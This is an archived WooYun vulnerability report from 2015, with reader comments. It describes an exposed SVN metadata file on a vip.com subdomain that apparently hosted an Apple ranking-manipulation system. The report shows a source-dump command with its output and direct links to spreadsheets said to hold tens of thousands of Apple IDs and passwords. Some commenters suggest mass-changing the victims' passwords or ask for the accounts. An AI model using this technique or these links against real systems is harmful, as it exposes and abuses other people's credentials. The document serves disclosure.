当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096886

漏洞标题:唯品会某APPLE刷榜系统配置不当导致几万+APPLEID和密码泄露

相关厂商:唯品会

漏洞作者: 路人甲

提交时间:2015-05-18 20:20

修复时间:2015-05-19 11:37

公开时间:2015-05-19 11:37

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

唯品会某APPLE刷榜系统配置不当导致几万+APPLEID和密码泄露

详细说明:

http://ns6.vip.com/.svn/entries

python svn.py http://ns6.vip.com /
*****************************************************
* Fetching: http://ns6.vip.com/
* mkdir ns6.vip.com/
* svn://192.168.1.199/project/web/public
* svn://192.168.1.199/project
*****************************************************
['', 'appuser', 'update', 'styles', 'upload_image', 'css', 'jpgraph', 'sql', 'fck', 'ckeditor', 'excelupload', 'images', 'phpExcel', 'js']
appuser
['appuser/']
['updatenewuser.php', 'updatenewusercn.php', 'updateser.php', 'conn.php', 'updatenewuser2.php', 'getuser.php', 'updatenewuser3.php', 'updateuserid.php', 'updatenewuser4.php', 'updatenewuserjp.php', 'updatenewuser2jp.php']
update
['update/']


EXCEL内的账号,单个文件都是上万个!

http://ns6.vip.com/excelupload/20130320060555.xlsx
http://ns6.vip.com/excelupload/20130320061407.xlsx
http://ns6.vip.com/excelupload/20130320062025.xlsx
http://ns6.vip.com/excelupload/20130320062301.xlsx
http://ns6.vip.com/excelupload/20130320062509.xlsx
http://ns6.vip.com/excelupload/20130329054905.xlsx
http://ns6.vip.com/excelupload/20130329062446.xlsx
http://ns6.vip.com/excelupload/20130416124807.xlsx
http://ns6.vip.com/excelupload/20130429104951.xlsx

漏洞证明:

apple_xls.png


apple_id.png


appdata.sql.jpg

修复方案:

删除

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-19 11:37

厂商回复:

对应的服务器并非唯品会服务器也并非唯品会服务。此处存在域名解析错误。故此忽略,感谢对唯品会信息安全的关注!

漏洞Rank:10 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-18 21:18 | null_z ( 普通白帽子 | Rank:251 漏洞数:30 )

    哈哈,洞主你这么说厂商敢认领么

  2. 2015-05-18 21:32 | Blackgame ( 实习白帽子 | Rank:70 漏洞数:13 | dddd)

    这洞主牛呀!APPLE ID 和密码都能搞到

  3. 2015-05-18 21:39 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    哈哈,洞主你这么说厂商敢认领么

  4. 2015-05-18 22:29 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    洞主你这么说厂商敢认领么

  5. 2015-05-18 22:50 | sdc1992 ( 实习白帽子 | Rank:32 漏洞数:12 )

    洞主你这么说厂商敢认领么

  6. 2015-05-19 00:10 | plane636 ( 普通白帽子 | Rank:160 漏洞数:16 )

    哈哈,洞主你这么说厂商敢认领么

  7. 2015-05-19 00:19 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    刷榜系统,好无耻。。。

  8. 2015-05-19 08:29 | 杀器王子 认证白帽子 ( 普通白帽子 | Rank:1532 漏洞数:121 | 磨刀霍霍向猪羊)

    我留了几个月的洞被你发了 不开心

  9. 2015-05-19 08:37 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    杀器已哭晕在厕所

  10. 2015-05-19 08:54 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @杀器王子 096886,看这个漏洞id,是提交了很久被出来鞭尸的

  11. 2015-05-19 09:05 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @猪猪侠 额,的确是额,目测有好几个月了!

  12. 2015-05-19 09:20 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    这个漏洞有条件限制吗

  13. 2015-05-19 15:03 | xiaogui ( 实习白帽子 | Rank:88 漏洞数:24 | 围观大牛来了~~~)

    哈哈,洞主你这么说厂商敢认领么

  14. 2015-05-19 16:23 | milan ( 普通白帽子 | Rank:129 漏洞数:32 | 妈妈说:搬不完砖就别回家。)

    哈哈,洞主你这么说厂商敢认领么

  15. 2015-05-19 17:34 | 北丐 ( 普通白帽子 | Rank:104 漏洞数:20 | )

    哈哈,洞主你这么说厂商敢认领么

  16. 2015-05-21 19:30 | 红糖哥 ( 实习白帽子 | Rank:70 漏洞数:8 | 红糖暖胃不暖逼)

    哈哈,洞主你这么说厂商敢认领么

  17. 2015-05-21 19:32 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    洞主应该批量把apple的密码改掉,让厂商哭晕在厕所

  18. 2015-05-21 20:58 | 丁崽 ( 路人 | Rank:5 漏洞数:1 | 没有)

    楼主第三张图用的是什么编辑器啊

  19. 2015-05-21 22:06 | 咖啡 ( 实习白帽子 | Rank:48 漏洞数:20 )

    域名解析错误, lol

  20. 2015-05-22 09:34 | 爱捣蛋的鬼 ( 路人 | Rank:19 漏洞数:3 | 爱捣蛋的鬼)

    @丁崽 ue

  21. 2015-05-22 11:10 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)

    哈哈,洞主你这么说厂商敢认领么

  22. 2015-05-22 11:11 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    跪求帐号

  23. 2015-05-22 11:25 | Knight ( 实习白帽子 | Rank:38 漏洞数:10 | 刚刚上洗手间,看到一个玉树临风的少年,气...)

    洞主你这么说厂商敢认领么。